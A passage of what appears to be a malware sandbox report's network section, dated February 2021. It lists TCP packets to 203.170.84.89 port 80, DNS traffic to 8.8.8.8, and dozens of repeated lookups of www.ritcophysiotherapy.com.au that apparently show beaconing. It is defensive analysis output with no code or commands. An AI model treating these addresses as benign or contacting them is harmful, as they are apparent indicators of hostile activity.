                                          Feb 22, 2021 19:13:11.089250088 CET8049753203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:11.089572906 CET4975380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:11.423415899 CET8049753203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:11.455200911 CET8049753203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:11.455538988 CET8049753203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:11.455585003 CET4975380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:11.455646038 CET4975380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:11.787161112 CET4975480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:11.789374113 CET8049753203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:12.124365091 CET8049754203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:12.124721050 CET4975480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:12.128792048 CET4975480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:12.465698957 CET8049754203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:12.465974092 CET4975480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:12.802908897 CET8049754203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:12.833798885 CET8049754203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:12.833843946 CET8049754203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:12.833997965 CET4975480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:12.834304094 CET4975480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:13.102169991 CET4975580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:13.171260118 CET8049754203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:13.439296007 CET8049755203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:13.439465046 CET4975580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:13.445902109 CET4975580192.168.2.4203.170.84.89

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Feb 22, 2021 19:12:46.699098110 CET4971453192.168.2.48.8.8.8
                                          Feb 22, 2021 19:12:46.757280111 CET53497148.8.8.8192.168.2.4
                                          Feb 22, 2021 19:12:47.485116005 CET5802853192.168.2.48.8.8.8
                                          Feb 22, 2021 19:12:47.533768892 CET53580288.8.8.8192.168.2.4
                                          Feb 22, 2021 19:12:48.048538923 CET5309753192.168.2.48.8.8.8
                                          Feb 22, 2021 19:12:48.110224009 CET53530978.8.8.8192.168.2.4
                                          Feb 22, 2021 19:12:48.537398100 CET4925753192.168.2.48.8.8.8
                                          Feb 22, 2021 19:12:48.586189032 CET53492578.8.8.8192.168.2.4
                                          Feb 22, 2021 19:12:49.546427965 CET6238953192.168.2.48.8.8.8
                                          Feb 22, 2021 19:12:49.600754976 CET53623898.8.8.8192.168.2.4
                                          Feb 22, 2021 19:12:50.922528982 CET4991053192.168.2.48.8.8.8
                                          Feb 22, 2021 19:12:50.971520901 CET53499108.8.8.8192.168.2.4
                                          Feb 22, 2021 19:12:52.349210024 CET5585453192.168.2.48.8.8.8
                                          Feb 22, 2021 19:12:52.400909901 CET53558548.8.8.8192.168.2.4
                                          Feb 22, 2021 19:12:53.197659969 CET6454953192.168.2.48.8.8.8
                                          Feb 22, 2021 19:12:53.249222040 CET53645498.8.8.8192.168.2.4
                                          Feb 22, 2021 19:12:54.069267988 CET6315353192.168.2.48.8.8.8
                                          Feb 22, 2021 19:12:54.118216038 CET53631538.8.8.8192.168.2.4
                                          Feb 22, 2021 19:12:54.963105917 CET5299153192.168.2.48.8.8.8
                                          Feb 22, 2021 19:12:55.012037992 CET53529918.8.8.8192.168.2.4
                                          Feb 22, 2021 19:12:55.750237942 CET5370053192.168.2.48.8.8.8
                                          Feb 22, 2021 19:12:55.801871061 CET53537008.8.8.8192.168.2.4
                                          Feb 22, 2021 19:12:56.992151976 CET5172653192.168.2.48.8.8.8
                                          Feb 22, 2021 19:12:57.060209036 CET53517268.8.8.8192.168.2.4
                                          Feb 22, 2021 19:12:57.798089027 CET5679453192.168.2.48.8.8.8
                                          Feb 22, 2021 19:12:57.847174883 CET53567948.8.8.8192.168.2.4
                                          Feb 22, 2021 19:12:58.594722033 CET5653453192.168.2.48.8.8.8
                                          Feb 22, 2021 19:12:58.645100117 CET53565348.8.8.8192.168.2.4
                                          Feb 22, 2021 19:12:59.454663992 CET5662753192.168.2.48.8.8.8
                                          Feb 22, 2021 19:12:59.506560087 CET53566278.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:00.408385038 CET5662153192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:00.457483053 CET53566218.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:01.223525047 CET6311653192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:01.273691893 CET53631168.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:01.605370045 CET6407853192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:01.708600998 CET53640788.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:02.055803061 CET6480153192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:02.106054068 CET53648018.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:03.013977051 CET6172153192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:03.113802910 CET53617218.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:03.449681044 CET5125553192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:03.501132965 CET53512558.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:04.268918991 CET6152253192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:04.329303026 CET53615228.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:05.635144949 CET5233753192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:05.698806047 CET53523378.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:07.006390095 CET5504653192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:07.065711021 CET53550468.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:08.984812021 CET4961253192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:09.033745050 CET53496128.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:10.312819958 CET4928553192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:10.409897089 CET53492858.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:11.686445951 CET5060153192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:11.784482002 CET53506018.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:13.049364090 CET6087553192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:13.098505974 CET53608758.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:14.353496075 CET5644853192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:14.410690069 CET53564488.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:15.696485043 CET5917253192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:15.753534079 CET53591728.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:17.004920006 CET6242053192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:17.062061071 CET53624208.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:18.343101025 CET6057953192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:18.400012016 CET53605798.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:19.644253969 CET5018353192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:19.701555014 CET53501838.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:19.753859997 CET6153153192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:19.802674055 CET53615318.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:20.936100960 CET4922853192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:20.985097885 CET53492288.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:22.276679039 CET5979453192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:22.325532913 CET53597948.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:23.601208925 CET5591653192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:23.659809113 CET53559168.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:24.954325914 CET5275253192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:25.014542103 CET53527528.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:26.557146072 CET6054253192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:26.614264011 CET53605428.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:27.872664928 CET6068953192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:27.933027983 CET53606898.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:29.179162979 CET6420653192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:29.239970922 CET53642068.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:30.478329897 CET5090453192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:30.543951035 CET53509048.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:31.792977095 CET5752553192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:31.841751099 CET53575258.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:33.080705881 CET5381453192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:33.143090010 CET53538148.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:34.416704893 CET5341853192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:34.473993063 CET53534188.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:35.697698116 CET6283353192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:35.749298096 CET53628338.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:36.296514988 CET5926053192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:36.380817890 CET53592608.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:36.940398932 CET4994453192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:36.975975990 CET6330053192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:37.035079956 CET53499448.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:37.036025047 CET53633008.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:37.580722094 CET6144953192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:37.639991045 CET53614498.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:37.969660044 CET5127553192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:38.034594059 CET53512758.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:38.041256905 CET6349253192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:38.098578930 CET53634928.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:38.294977903 CET5894553192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:38.343662024 CET53589458.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:38.579691887 CET6077953192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:38.675987959 CET53607798.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:39.268973112 CET6401453192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:39.320518970 CET53640148.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:39.589708090 CET5709153192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:39.638431072 CET53570918.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:39.894169092 CET5590453192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:39.953531027 CET53559048.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:40.592643976 CET5210953192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:40.659733057 CET53521098.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:40.767162085 CET5445053192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:40.827141047 CET53544508.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:40.908086061 CET4937453192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:40.957115889 CET53493748.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:41.681437969 CET5043653192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:41.740370035 CET53504368.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:42.180453062 CET6260553192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:42.241112947 CET5425653192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:42.242538929 CET53626058.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:42.303832054 CET53542568.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:43.470884085 CET5218953192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:43.532692909 CET53521898.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:44.744219065 CET5613153192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:44.793344975 CET53561318.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:46.029913902 CET6299253192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:46.095216990 CET53629928.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:47.358259916 CET5443253192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:47.418471098 CET53544328.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:48.636250973 CET5722753192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:48.698528051 CET53572278.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:49.926906109 CET5838353192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:49.976164103 CET53583838.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:51.217977047 CET6313653192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:51.275183916 CET53631368.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:52.534214973 CET5091153192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:52.587490082 CET53509118.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:53.826677084 CET6340953192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:53.875464916 CET53634098.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:54.005342960 CET5918553192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:54.021559000 CET6423653192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:54.057297945 CET53591858.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:54.078851938 CET53642368.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:55.097614050 CET5615753192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:55.155000925 CET53561578.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:56.374689102 CET5560153192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:56.423229933 CET53556018.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:57.165973902 CET5298453192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:57.226808071 CET53529848.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:57.636794090 CET5114153192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:57.693878889 CET53511418.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:58.918042898 CET5361053192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:58.975639105 CET53536108.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:00.227699995 CET6124753192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:00.289978027 CET53612478.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:01.510381937 CET6516553192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:01.575758934 CET53651658.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:02.839185953 CET5207653192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:02.888058901 CET53520768.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:04.114171028 CET5490353192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:04.163002968 CET53549038.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:05.420623064 CET5504553192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:05.469511986 CET53550458.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:06.720895052 CET5446453192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:06.769843102 CET53544648.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:08.022066116 CET5097053192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:08.070943117 CET53509708.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:09.293391943 CET5526153192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:09.352627993 CET53552618.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:10.585911036 CET5980953192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:10.638309002 CET53598098.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:11.897115946 CET5127853192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:11.957366943 CET53512788.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:13.196566105 CET5193253192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:13.248152971 CET53519328.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:15.029618979 CET5949453192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:15.078545094 CET53594948.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:16.292236090 CET5591553192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:16.344048023 CET53559158.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:17.598541975 CET4977953192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:17.658497095 CET53497798.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:18.904568911 CET4945853192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:18.961647034 CET53494588.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:20.202388048 CET5716453192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:20.252974033 CET53571648.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:21.463465929 CET4984053192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:21.528162003 CET53498408.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:22.777031898 CET5717453192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:22.828773975 CET53571748.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:24.085288048 CET5853153192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:24.138386965 CET53585318.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:25.337888002 CET4960853192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:25.386800051 CET53496088.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:26.620599985 CET5568253192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:26.670846939 CET53556828.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:27.894123077 CET6243653192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:27.951292992 CET53624368.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:29.153413057 CET6123053192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:29.203366041 CET53612308.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:29.859769106 CET6473053192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:29.908608913 CET53647308.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:30.406487942 CET6062453192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:30.455286026 CET53606248.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:31.681385040 CET6260053192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:31.727921963 CET5320053192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:31.749803066 CET53626008.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:31.792812109 CET53532008.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:33.020991087 CET6103453192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:33.069703102 CET53610348.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:34.320353031 CET5768753192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:34.368915081 CET53576878.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:35.638341904 CET4983953192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:35.686975956 CET53498398.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:36.937913895 CET5797553192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:36.989465952 CET53579758.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:38.226160049 CET5761053192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:38.275090933 CET53576108.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:39.548564911 CET5513753192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:39.597359896 CET53551378.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:40.861488104 CET5921653192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:40.910367966 CET53592168.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:42.153589010 CET6349553192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:42.204519987 CET53634958.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:43.443846941 CET6437153192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:43.493170977 CET53643718.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:44.731411934 CET5403753192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:44.783324003 CET53540378.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:46.037934065 CET5348153192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:46.086884975 CET53534818.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:47.326683998 CET5831353192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:47.375808954 CET53583138.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:48.652367115 CET5895053192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:48.703289032 CET53589508.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:49.946625948 CET5501153192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:49.995392084 CET53550118.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:51.218924046 CET5719853192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:51.267704964 CET53571988.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:52.516993046 CET6087553192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:52.566010952 CET53608758.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:53.796204090 CET5513453192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:53.844918966 CET53551348.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:55.085910082 CET5369553192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:55.140264988 CET53536958.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:56.344922066 CET5097553192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:56.395956993 CET53509758.8.8.8192.168.2.4

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                          Feb 22, 2021 19:13:01.605370045 CET192.168.2.48.8.8.80xf2b4Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:03.013977051 CET192.168.2.48.8.8.80xc3d2Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:04.268918991 CET192.168.2.48.8.8.80xf658Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:05.635144949 CET192.168.2.48.8.8.80xf93eStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:07.006390095 CET192.168.2.48.8.8.80xa7f6Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:08.984812021 CET192.168.2.48.8.8.80x3a63Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:10.312819958 CET192.168.2.48.8.8.80xddf9Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:11.686445951 CET192.168.2.48.8.8.80x96c5Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:13.049364090 CET192.168.2.48.8.8.80x7723Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:14.353496075 CET192.168.2.48.8.8.80xfb83Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:15.696485043 CET192.168.2.48.8.8.80x4299Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:17.004920006 CET192.168.2.48.8.8.80xdb49Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:18.343101025 CET192.168.2.48.8.8.80x177cStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:19.644253969 CET192.168.2.48.8.8.80xbe65Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:20.936100960 CET192.168.2.48.8.8.80x7c9dStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:22.276679039 CET192.168.2.48.8.8.80x8e2aStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:23.601208925 CET192.168.2.48.8.8.80x4b1cStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:24.954325914 CET192.168.2.48.8.8.80x9f7Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:26.557146072 CET192.168.2.48.8.8.80x8dcaStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:27.872664928 CET192.168.2.48.8.8.80xe56cStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:29.179162979 CET192.168.2.48.8.8.80xd2aeStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:30.478329897 CET192.168.2.48.8.8.80x5c1dStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:31.792977095 CET192.168.2.48.8.8.80x73e3Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:33.080705881 CET192.168.2.48.8.8.80xa1caStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:34.416704893 CET192.168.2.48.8.8.80xc977Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:35.697698116 CET192.168.2.48.8.8.80x43e1Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:36.975975990 CET192.168.2.48.8.8.80x5256Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:38.294977903 CET192.168.2.48.8.8.80xba7cStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:39.589708090 CET192.168.2.48.8.8.80x6371Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:40.908086061 CET192.168.2.48.8.8.80x8eb6Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:42.180453062 CET192.168.2.48.8.8.80x3351Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:43.470884085 CET192.168.2.48.8.8.80x40f2Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:44.744219065 CET192.168.2.48.8.8.80xb103Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:46.029913902 CET192.168.2.48.8.8.80x15f5Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:47.358259916 CET192.168.2.48.8.8.80xe9f4Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:48.636250973 CET192.168.2.48.8.8.80x8755Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:49.926906109 CET192.168.2.48.8.8.80xa2eStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:51.217977047 CET192.168.2.48.8.8.80xb66aStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:52.534214973 CET192.168.2.48.8.8.80xaab4Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:53.826677084 CET192.168.2.48.8.8.80x94a5Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:55.097614050 CET192.168.2.48.8.8.80xfe8eStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:56.374689102 CET192.168.2.48.8.8.80xf40bStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
